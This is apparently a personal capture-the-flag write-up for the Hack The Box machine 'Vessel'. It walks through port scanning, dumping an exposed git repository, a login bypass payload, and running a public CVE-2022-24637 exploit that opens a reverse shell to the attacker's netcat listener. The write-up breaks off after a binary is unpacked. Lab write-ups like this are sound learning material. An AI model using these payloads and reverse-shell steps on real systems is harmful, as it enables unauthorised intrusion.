Vessel
Let's start off with nmap:
nmap -sC -sV -T4 10.129.227.225
Host is up (0.058s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 38c297327b9ec565b44b4ea330a59aa5 (RSA)
| 256 33b355f4a17ff84e48dac5296313833d (ECDSA)
|_ 256 a1f1881c3a397274e6301f28b680254e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Vessel
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Only ports 22 and 80 open. Let's skip SSH and head to http!
Wappalyzer tells us that the site/backend is built with Express/Node JS and the footer reveals a domain vessel.htb. First, let's add that to our etc/hosts:
sudo nano /etc/hosts
File should look like this:
127.0.0.1 localhost
127.0.1.1 joonas-VirtualBox
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.227.225 vessel.htb
There also seems to be a login page:
There's also a register page but it does not seem to be functioning.
Next, let's run gobuster to find endpoints/pages:
gobuster dir -u http://vessel.h
tb -w /opt/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -t 30
--exclude-length 26
After not too long we get some results:
===============================================================
2023/01/16 19:52:40 Starting gobuster in directory enumeration mode
===============================================================
/js (Status: 301) [Size: 171] [--> /js/]
/logout (Status: 302) [Size: 28] [--> /login]
/img (Status: 301) [Size: 173] [--> /img/]
/404 (Status: 200) [Size: 2393]
/dev (Status: 301) [Size: 173] [--> /dev/]
/. (Status: 200) [Size: 15030]
/admin (Status: 302) [Size: 28] [--> /login]
/register (Status: 200) [Size: 5830]
/500 (Status: 200) [Size: 2335]
/css (Status: 301) [Size: 173] [--> /css/]
/401 (Status: 200) [Size: 2400]
/login (Status: 200) [Size: 4213]
/reset (Status: 200) [Size: 3637]
Dev seems interesting, let's check that out! It seems that /dev/ redirects us to 404:
But earlier we got a 301 redirect from /dev which is strange. Also, brute forcing directories does not show any results. But since the pathname is dev maybe there's a git repository? Let's try using gitdumper. Note: sourcecode is the folder name where the script stores the results.
git-dumper http://vessel.htb/dev/ sourcecode
That did it! Let's take a look of the login function:
At first it seems like there's nothing exploitable but according to this article this is not secure and we can bypass it with payload:
username=admin&password[password]=1
Basically, this payload structures the query like we are making query like this:
SELECT * FROM accounts WHERE username = 'admin' AND password = `password` = 1
which is always true if database has admin-named user.
Let's login and let Burpsuite intercept our request:
We get in:
The analytics-link leads us to another subdomain: openwebanalytics.vessel.htb ,let's add it to our /etc/hosts -file:
127.0.0.1 localhost
127.0.1.1 joonas-VirtualBox
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.227.225 vessel.htb openwebanalytics.vessel.htb
The analytics-site seems to be built with Open Web analytics which is open source software. Looking at the source code we even get the used version:
Quick Googling reveals us that the version 1.7.3 is vulnerable to CVE-2022-24637 and there is also a public PoC available on github! Let's download the exploit. Before running it, let's set a netcat listener on port 9001:
nc -lnvp 9001
Now, run the exploit:
python3 exploit.py http://openwebanalytics.vessel.htb/ 10.10.14.90 9001
And we get a shell as www-data!
joonas@joonas-VirtualBox:~$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.227.225 46914
ls
1
1ZDJPckC.php
cache.lock
whoami
www-data
We have access to user stevenĀ“s home folder and theres some kind of passwordGenerator app. Also, there's a notes folder with two files: notes.pdf and screenshot.png:
cd /home/steven
ls
passwordGenerator
ls -la
total 33796
drwxrwxr-x 3 steven steven 4096 Aug 11 14:43 .
drwxr-xr-x 4 root root 4096 Aug 11 14:43 ..
lrwxrwxrwx 1 root root 9 Apr 18 2022 .bash_history -> /dev/null
-rw------- 1 steven steven 220 Apr 17 2022 .bash_logout
-rw------- 1 steven steven 3771 Apr 17 2022 .bashrc
drwxr-xr-x 2 ethan steven 4096 Aug 11 14:43 .notes
-rw------- 1 steven steven 807 Apr 17 2022 .profile
-rw-r--r-- 1 ethan steven 34578147 May 4 2022 passwordGenerator
cd .notes
ls
notes.pdf
screenshot.png
After downloading the files to our machine (you can use netcat for that) Let's check what they are all about:
The passwordGenerator seems to be Microsoft executable:
joonas@joonas-VirtualBox:~/Documents/htb/vessel/$ file passwordGenerator
passwordGenerator: PE32 executable (console) Intel 80386, for MS Windows
joonas@joonas-VirtualBox:~/Documents/htb/vessel/$
The screenshot seems to be a photo of the app:
And the notes.pdf is a password-protected pdf file. Time to reverse the generator.
Running strings on the app prints many instances of python and python 3.7 so chances are it is a python-based app. Binwalk also gives an impression that the file is encoded. Python based executables are usually made with pyinstaller and we can try to reverse it. Theres a package pyinstxtractor which can do this for us. It is good practice to use same Python version on our machine as the app was made in. In this case it's 3.7. For this we can use pyenv. After settings up python we can run the instxtractor:
python pyinstxtractor.py ../reverse/passwordGenerator
joonas@joonas-VirtualBox:~/Documents/htb/vessel/pyinstxtractor$ python pyinstxtractor.py ../passwordGenerator
[+] Processing ../passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[+] Found 142 files in PYZ archive
[+] Successfully extracted pyinstaller archive: ../passwordGenerator
You can now use a python decompiler on the pyc files within the extracted directory
TO BE CONTINUED